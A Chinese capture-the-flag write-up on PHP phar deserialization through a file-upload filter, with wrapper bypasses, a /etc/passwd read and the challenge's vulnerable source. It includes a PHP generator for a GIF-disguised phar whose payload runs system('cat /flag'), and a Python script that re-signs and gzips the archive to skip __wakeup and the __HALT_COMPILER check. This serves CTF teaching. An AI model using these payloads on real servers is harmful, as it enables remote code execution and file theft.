phar绕过phar与HALT实现文件上传功能

作者:偶尔躲躲乌云334 时间:2023-05-25 06:47:36 

前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。

知道今天看到了一篇好的文章

如果过滤了phar这个伪造协议的话,那还是比较简单的

if(preg_match("/^php|^file|^phar|^dict|^zip/i",$filename){

die(); }例如这样进行了过滤

绕过的话,我们可以用各种协议进行绕过

1、php://filter/read=convert.base64-encode/resource=phar://test.phar

//即使用filter伪协议来进行绕过

2、compress.bzip2://phar:///test.phar/test.txt

//使用bzip2协议来进行绕过

3、compress.zlib://phar:///home/sx/test.phar/test.txt

//使用zlib协议进行绕过

当如果__HALT_COMPILER被过滤了

PHP通过__HALT_COMPILER来识别Phar文件,那么出于安全考虑,即为了防止Phar反序列化的出现,可能就会对这个进行过滤,示例代码如下

因为phar是通过这个来判断是不是phar文件,而不是通过后缀来判断,所以我们可以随便的更改后缀而不会影响效果

这里的办法:是将生成的Phar文件进行gzip压缩

gziptest.phar

cat test.phar.gz

例题: [NSSRound#4 SWPU]1zweb

phar绕过phar与HALT实现文件上传功能

打开题目以后,第一眼只是觉得是上传文件的漏洞,可是上传都不太行。

让我改变了一个思维,试了一下 /flag万一呢,eee

phar绕过phar与HALT实现文件上传功能

竟然出了,那就看看下一道进阶题,估计是出题人忽略了这个

[NSSRound#4 SWPU]1zweb(revenge)

这道题出题人就进行了限制

phar绕过phar与HALT实现文件上传功能

因为是前提的一个提示,所以我觉得也不会是单纯的文件上传漏洞

这时候试一下/etc/passwd,有没有任意文件读取漏洞,前面做过的一道题用到了这个。

phar绕过phar与HALT实现文件上传功能

果然有,那就读取一下源码index.php,和upload.php上传文件

<?php
if ($_FILES["file"]["error"] > 0){
   echo "上传异常";
}
else{
   $allowedExts = array("gif", "jpeg", "jpg", "png");
   $temp = explode(".", $_FILES["file"]["name"]);
   $extension = end($temp);
   if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
       $content=file_get_contents($_FILES["file"]["tmp_name"]);
       $pos = strpos($content, "__HALT_COMPILER();");
       if(gettype($pos)==="integer"){
           echo "ltj一眼就发现了phar";
       }else{
           if (file_exists("./upload/" . $_FILES["file"]["name"])){
               echo $_FILES["file"]["name"] . " 文件已经存在";
           }else{
               $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
               fwrite($myfile, $content);
               fclose($myfile);
               echo "上传成功 ./upload/".$_FILES["file"]["name"];
           }
       }
   }else{
       echo "dky不喜欢这个文件 .".$extension;
   }
}
?>

限制了后缀只能是,gif,jpeg,jpg,png格式,并且过滤了HALT_COMPILER(), 所以这道题的考点就是绕过这个

<?php
class LoveNss{
   public $ljt;
   public $dky;
   public $cmd;
   public function __construct(){
       $this->ljt="ljt";
       $this->dky="dky";
       phpinfo();
   }
   public function __destruct(){
       if($this->ljt==="Misc"&&$this->dky==="Re")
           eval($this->cmd);
   }
   public function __wakeup(){
       $this->ljt="Re";
       $this->dky="Misc";
   }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
   if (preg_match("/flag/", $file)) {
   die("nonono");
   }
   echo file_get_contents($file);
}

这个反序列化,是简单的,仅仅是绕过wakeup就可以,考点并不在这里,发现没有serialize这个的参数,而且有文件上传并且file_get_contents可以触发phar序列化,所以确定了需要phar.

这里就出现了一个问题,phar如何绕过wakeup呢,如何把属性值加1呢,我们先不考虑这些,先写出phar 文件来

<?php
class LoveNss{
   public $ljt;
   public $dky;
   public $cmd;
   public function __construct(){
       $this->ljt="Misc";
       $this->dky="Re";
       $this->cmd="system('cat /flag');";
   }
}
$phar = new Phar('quan9i.phar');
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ? >');
$a = new LoveNss();
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
?>

这个比较简单,就直接过了,然后就需要考虑我们以上的问题了

import gzip
from hashlib import sha1
with open('D:\\phpstudy\\quan9i.phar', 'rb') as file:
   f = file.read()
s = f[:-28] # 获取要签名的数据
s = s.replace(b'3:{', b'4:{')#更换属性值,绕过__wakeup
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB)
#print(newf)
newf = gzip.compress(newf) #对Phar文件进行gzip压缩
with open('D:\\phpStudy\\newquanqi.png', 'wb') as file:#更改文件后缀
   file.write(newf)

找到我们生成phar的文件目录,只读

因为我们改变了phar里面的内容,wakeup属性值,所以需要重新生成一个标签

phar绕过phar与HALT实现文件上传功能

就会直接生成一个png的文件,我们直接上传然后phar协议读取

phar绕过phar与HALT实现文件上传功能

来源:https://blog.csdn.net/qq_62046696/article/details/127195593

标签:phar,文件上传,HALT,phar
0
投稿

猜你喜欢

  • PyTorch手写数字数据集进行多分类

    2022-10-18 22:29:23
  • python爬虫开发之Beautiful Soup模块从安装到详细使用方法与实例

    2023-12-09 06:16:18
  • 使用python Django做网页

    2023-11-22 03:35:26
  • django 发送手机验证码的示例代码

    2023-05-07 03:42:37
  • MYSQL的binary解决mysql数据大小写敏感问题的方法

    2024-01-25 16:38:26
  • python可视化分析绘制带趋势线的散点图和边缘直方图

    2023-08-16 04:10:10
  • MySQL列类型的选择与MySQL的查询效率

    2009-01-14 12:53:00
  • 详解Windows Server 2012下安装MYSQL5.7.24的问题

    2024-01-27 10:20:37
  • python密码学各种加密模块教程

    2021-03-10 05:32:55
  • 又一个仿alert提示效果

    2007-12-24 17:34:00
  • Python+OpenCV实现阈值分割的方法详解

    2023-08-13 02:24:00
  • 用ASP和SQL语句动态的创建Access表

    2008-10-14 16:59:00
  • python中plot实现即时数据动态显示方法

    2021-04-20 22:09:18
  • 利用aspjpeg组件自动生成产品缩略图asp源代码

    2007-08-10 10:14:00
  • PyQt5+Pycharm安装和配置图文教程详解

    2022-12-20 08:50:26
  • seatunnel 2.3.1全流程部署使用教程

    2022-02-01 02:38:51
  • python实现线性插值的示例

    2023-08-10 21:33:55
  • Kettle中使用JavaScrip调用jar包对文件内容进行MD5加密的操作方法

    2024-04-30 09:58:23
  • 微信小程序中显示倒计时代码实例

    2024-04-23 09:32:22
  • 貌似很强的mysql备份策略分享

    2024-01-27 18:37:03
  • asp之家 网络编程 m.aspxhome.com